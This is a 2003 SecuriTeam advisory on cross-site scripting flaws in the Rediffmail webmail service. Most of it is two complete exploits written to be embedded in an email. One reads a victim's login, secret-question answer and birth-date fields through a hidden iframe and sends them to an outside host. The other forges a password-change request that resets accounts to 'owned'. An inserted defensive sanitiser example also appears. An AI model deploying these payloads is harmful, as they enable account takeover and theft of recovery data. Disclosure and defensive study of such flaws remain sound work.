[NEWS] Serious Vulnerabilities Found in Rediffmail.com Web Mail Service (CSS)
From: SecuriTeam (support_at_securiteam.com)
Date: 07/07/03
To: list@securiteam.com Date: 7 Jul 2003 19:32:34 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Serious Vulnerabilities Found in Rediffmail.com Web Mail Service (CSS)
------------------------------------------------------------------------
SUMMARY
Rediff.com (<http://www.rediff.com>), which describes itself as "a premier
portal in India" with a large user base, has been found not to filter HTML and
JavaScript out of the e-mail messages it displays to its users (a cross-site
scripting flaw; "CSS" in the title is the older abbreviation). The flaw allows
an attacker to gain access to any user's account by sending that user a
specially crafted e-mail, which takes effect as soon as the message is opened
in the web interface.
DETAILS
changepass.cgi Exploitation (Requires Cross-Frame Vulnerability):
changepass.cgi is the interface for changing the user's password. It requires a
valid session id, so the victim must already be logged on to the system. In
addition, our code has to execute in the same domain as changepass.cgi
(login.rediff.com) in order to read and control the password-change form; the
exploit below does this by loading changepass.cgi in a hidden iframe and then
reaching into that frame's document from the mail page, which is only possible
in a browser with a cross-frame scripting bug (the code targets Internet
Explorer).
Both conditions are met by sending a specially crafted e-mail to a rediff.com
user, because the service does not filter HTML and JavaScript tags out of the
messages it displays: the injected script runs in the logged-on victim's
browser, and it recovers the victim's login and session id from the page's own
HTML (the login= and session_id= parameters appear in the rendered message
view), which is all it needs to build the changepass.cgi URL.
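The root cause shared by both exploits is that message HTML reaches the victim's browser unfiltered. The following is an added example, not code from the advisory or from Rediff, of the allowlist sanitiser a webmail front end needs to run over every message body before rendering it (Node.js; the tag and attribute lists and the sample message are this example's own constructions). It strips script bodies, unknown elements such as the hidden iframe used by the first exploit, every on* handler, and javascript: URLs, and it treats anything it does not recognise as hostile.

```javascript
// Added example (not code from the advisory or from Rediff): a minimal allowlist
// HTML sanitiser for webmail message bodies. Everything not explicitly allowed
// is dropped. Tag/attribute lists and the sample message are constructed here.

const ALLOWED_TAGS = new Set(["p", "br", "b", "i", "u", "a", "img", "div", "span",
                              "table", "tr", "td", "ul", "ol", "li"]);
// Per-tag attribute allowlist. "style" and every "on*" handler are absent on purpose.
const ALLOWED_ATTRS = {
  a:   new Set(["href"]),
  img: new Set(["src", "alt", "width", "height"]),
};

// Accept http(s), mailto and scheme-less (relative) URLs; reject javascript:, data:,
// vbscript: and every other scheme, even when padded with whitespace/control chars.
function safeUrl(value) {
  const v = value.replace(/[\u0000-\u0020]/g, "").toLowerCase();
  if (/^(https?:|mailto:)/.test(v)) return true;
  return !/^[a-z][a-z0-9+.-]*:/.test(v);
}

// Rebuild one tag from the allowlists; returns "" for any element not allowed.
function rebuildTag(tag, name, attrs) {
  const lname = name.toLowerCase();
  if (!ALLOWED_TAGS.has(lname)) return "";
  if (tag.startsWith("</")) return "</" + lname + ">";
  const allowed = ALLOWED_ATTRS[lname] || new Set();
  const attrRe = /([a-zA-Z][a-zA-Z0-9-]*)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
  const kept = [];
  let m;
  while ((m = attrRe.exec(attrs)) !== null) {
    const aname = m[1].toLowerCase();
    const value = m[2] !== undefined ? m[2] : (m[3] !== undefined ? m[3] : m[4]);
    if (!allowed.has(aname)) continue;   // drops onload=, onerror=, style=, ...
    if ((aname === "href" || aname === "src") && !safeUrl(value)) continue;
    kept.push(" " + aname + '="' + value.replace(/"/g, "&quot;") + '"');
  }
  return "<" + lname + kept.join("") + ">";
}

function sanitizeHtml(html) {
  const out = html
    .replace(/<!--[\s\S]*?-->/g, "")                             // comments
    .replace(/<(script|style)\b[^>]*>[\s\S]*?<\/\1\s*>/gi, "")   // script/style with their bodies
    .replace(/<(?!\/?[a-zA-Z])/g, "&lt;");                       // a '<' that does not start a tag
  return out.replace(/<\/?([a-zA-Z][a-zA-Z0-9]*)\b([^>]*)>/g, rebuildTag);
}

// Constructed message modelled on the payload shapes in the advisory.
const SAMPLE_MAIL =
  '<p>Hello <b>saurav23</b>,</p>' +
  '<SCRIPT>var login = middleString(document.body.innerHTML, "login=", "&session_id=");</SCRIPT>' +
  '<iframe id="myFrame" style="width:0px" src="http://login.rediff.com/cgi-bin/gold/changepass.cgi"' +
  ' onLoad="handleLoad()"></iframe>' +
  '<img src="javascript:alert(1)" onerror="f()">' +
  '<a href="http://www.rediff.com/">Rediff</a>';

console.log(sanitizeHtml(SAMPLE_MAIL));
```

Note what this does not do: an img whose src is an ordinary http URL is still allowed, so a filter on the message body cannot by itself stop a forged GET to a state-changing endpoint like changepass.cgi; that has to be refused on the server. The implementation is also deliberately minimal (no entity decoding, no handling of a literal '>' inside attribute values), which is exactly why a maintained sanitiser library belongs in production rather than this one.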
Exploit:
The script should be placed within the <BODY> tags of an HTML message.
<SCRIPT>
// Exploit 1 as published. It runs in the victim's logged-on Rediffmail session,
// loads changepass.cgi in a hidden iframe on login.rediff.com, reads the
// change_pass form out of that frame (the cross-frame step) and ships the values
// to an attacker-controlled host (www.server.com here).
var sessionid, login, ifs, ife, link, version, temp;
var hlc = 0;   // ensures handleLoad() does its work only once

// Internet Explorer older than 5.5: navigate the frame to a javascript: URL so
// that the extraction code runs inside the frame's own document.
// window.external.NavigateAndFind(url, searchText, targetFrame) is IE-specific.
function f()
{
  var js = "javascript:" +
    "var user,hqa,newlink,month,day,year,city,imonth,iday,iyear;" +
    "user=document.change_pass.login.value;" +
    "hqa=document.change_pass.hinta.value;" +
    "city=document.change_pass.citypw.value;" +
    "imonth=document.change_pass.month.selectedIndex;" +
    "iday=document.change_pass.day.selectedIndex;" +
    "iyear=document.change_pass.year.selectedIndex;" +
    "month=document.change_pass.month.options[imonth].value;" +
    "day=document.change_pass.day.options[iday].value;" +
    "year=document.change_pass.year.options[iyear].value;" +
    "newlink='http://www.server.com/cgi-bin/logparam.pl?login='+user+'&hqa='+hqa+" +
    "'&month='+month+'&day='+day+'&year='+year+'&city='+city;" +
    "document.location=newlink;";
  window.external.NavigateAndFind(js, "ll", "myFrame");
}

// Returns the text between startString and endString in fullString, "" if
// startString is absent, and everything after startString if endString is absent.
function middleString(fullString, startString, endString)
{
  if (fullString.indexOf(startString) == -1)
  {
    return "";
  }
  var sub = fullString.substring(fullString.indexOf(startString) + startString.length,
                                 fullString.length);
  if (sub.indexOf(endString) == -1)
  {
    return sub;
  }
  return sub.substring(0, sub.indexOf(endString));
}

// Internet Explorer 5.5 and later: called from the iframe's onLoad. oDoc is the
// document of the frame on login.rediff.com; reading it from the mail page is the
// cross-frame access this exploit depends on (.Document is the IE property).
function handleLoad()
{
  var user, hqa, newlink, month, day, year, city;
  var imonth, iday, iyear;
  var oDoc = document.getElementById("myFrame").Document;
  if (hlc != 0)
  {
    return;
  }
  hlc = hlc + 1;
  user   = oDoc.change_pass.login.value;
  hqa    = oDoc.change_pass.hinta.value;    // secret-question answer
  city   = oDoc.change_pass.citypw.value;
  imonth = oDoc.change_pass.month.selectedIndex;
  iday   = oDoc.change_pass.day.selectedIndex;
  iyear  = oDoc.change_pass.year.selectedIndex;
  month  = oDoc.change_pass.month.options[imonth].value;
  day    = oDoc.change_pass.day.options[iday].value;
  year   = oDoc.change_pass.year.options[iyear].value;
  newlink = "http://www.server.com/cgi-bin/logparam.pl?login=" + user + "&hqa=" + hqa +
            "&month=" + month + "&day=" + day + "&year=" + year + "&city=" + city;
  // Send the harvested values to the attacker by navigating the hidden frame.
  window.frames['myFrame'].location = newlink;
}

// Detect the IE version to pick the cross-frame technique.
version = 0;
if (navigator.appVersion.indexOf("MSIE") != -1)
{
  temp = navigator.appVersion.split("MSIE");
  version = parseFloat(temp[1]);
}

// The victim's login and session id are scraped from the mail page's own HTML.
login     = middleString(document.body.innerHTML, "login=", "&session_id=");
sessionid = middleString(document.body.innerHTML, "&session_id=", "&function_name=");

// URL-escaped iframe markup; ifs decodes to
//   <iframe id="myFrame" name="myFrame" style="width:0px; height:0px; border: 0px" src="
ifs = unescape('%3Ciframe%20id%3D%22myFrame%22%20name%3D%22myFrame%22%20style%3D%22width%3A0px%3B%20height%3A0px%3B%20border%3A%200px%22%20src%3D%22');
if (version >= 5.5)
{
  // decodes to: " onLoad="handleLoad()"></iframe>
  ife = unescape('%22%20onLoad%3D%22handleLoad%28%29%22%3E%3C/iframe%3E');
}
else
{
  // decodes to: "></iframe>
  ife = unescape('%22%3E%3C/iframe%3E');
}
link = 'http://login.rediff.com/cgi-bin/gold/changepass.cgi?login=' + login +
       '&session_id=' + sessionid + '&FormName=show_change_pass';
document.write(ifs + link + ife);
if (version < 5.5)
{
  setTimeout("f()", 5000);   // give the frame time to load before reaching into it
}
</SCRIPT>
changepass.cgi Exploitation (Does Not Require a Cross-Frame Vulnerability):
The vulnerability lies in the way Rediff.com checks the 'Old Password'
parameter that must accompany a request to change the password to a new one.
An analysis of the 'change password' page reveals that the hidden form variable
'oldpassdb' carries the encoded/encrypted form of the old password. Rediff.com
verifies the old password typed by the user by comparing it against this value,
and both the typed password and 'oldpassdb' are supplied by the client.
As we control both values, we can effectively reset any user's password to
whatever we want. The one prerequisite is a valid 'oldpassdb' value: valid in
the system's format, not verified as belonging to the user, since the server
never checks that it generated this particular value for this particular
account rather than the attacker having produced an acceptable one.
This has proven to be easy, as comparing the 'oldpassdb' value across accounts
reveals that it is formed from the first two letters of the Rediff id together
with some characters of the old password. For example, accounts with the
following user ids:
saurav23@rediffmail.com
saudi_arabia_2k3@rediffmail.com
and the same password will have the same 'oldpassdb' value. (The sample value
used below, 'sa1a7AwhYV8SQ', is 13 characters long and begins with 'sa'; that is
the shape of a traditional DES crypt(3) hash with a two-character salt taken from
the user id, which would also explain why only a prefix of the password matters.
The author does not state the algorithm, so this is an inference, not a
confirmed detail.) One 'oldpassdb' computed for a known password therefore works
against every account whose id begins with the same two letters.
The rest is done by a JavaScript that executes when the victim opens the email.
Exploit:
The code given below must be placed between the <BODY> tags of the HTML mail
that is sent to the victim. The values given work against any Rediff.com
account whose id starts with the letters 'sa': op_enc is the 'oldpassdb' for
the password "aaaa" under that prefix, so the forged request passes the
old-password check and sets the account's password to "owned".
<SCRIPT>
// Exploit 2 as published: forge a complete password-change request and fire it
// as a hidden image fetch. No cross-frame access is needed; the only per-victim
// data are login and session_id, which are scraped from the mail page itself.
var newpass = "owned";           // password the account ends up with
var op_dec  = "aaaa";            // 'oldpasswd' as if typed by the user
var op_enc  = "sa1a7AwhYV8SQ";   // 'oldpassdb' for password "aaaa" and an id beginning "sa"

// Returns the text between startString and endString in fullString, "" if
// startString is absent, and everything after startString if endString is absent.
function middleString(fullString, startString, endString)
{
  if (fullString.indexOf(startString) == -1)
  {
    return "";
  }
  var sub = fullString.substring(fullString.indexOf(startString) + startString.length,
                                 fullString.length);
  if (sub.indexOf(endString) == -1)
  {
    return sub;
  }
  return sub.substring(0, sub.indexOf(endString));
}

var login     = middleString(document.body.innerHTML, "login=", "&session_id=");
var sessionid = middleString(document.body.innerHTML, "&session_id=", "&function_name=");

// Every parameter of the change_pass form, including the client-supplied
// old-password check, in one GET request.
var link = "http://login.rediff.com/cgi-bin/gold/changepass.cgi?login=" + login +
           "&session_id=" + sessionid +
           "&oldpassdb=" + op_enc +
           "&FormName=change_pass" +
           "&oldpasswd=" + op_dec +
           "&passwd=" + newpass +
           "&passwd1=" + newpass +
           "&hintq=What+is+the+name+of+your+first+school%3F&hintq1=&hinta=qwerty" +
           "&month=1&day=01&year=1983&citypw=abc";
// A zero-size image makes the browser issue the request silently.
document.write('<img src="' + link + '" height=0 width=0>');
</SCRIPT>
ADDITIONAL INFORMATION
The information has been provided by Viper <mailto:viper31337@yahoo.co.in>.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.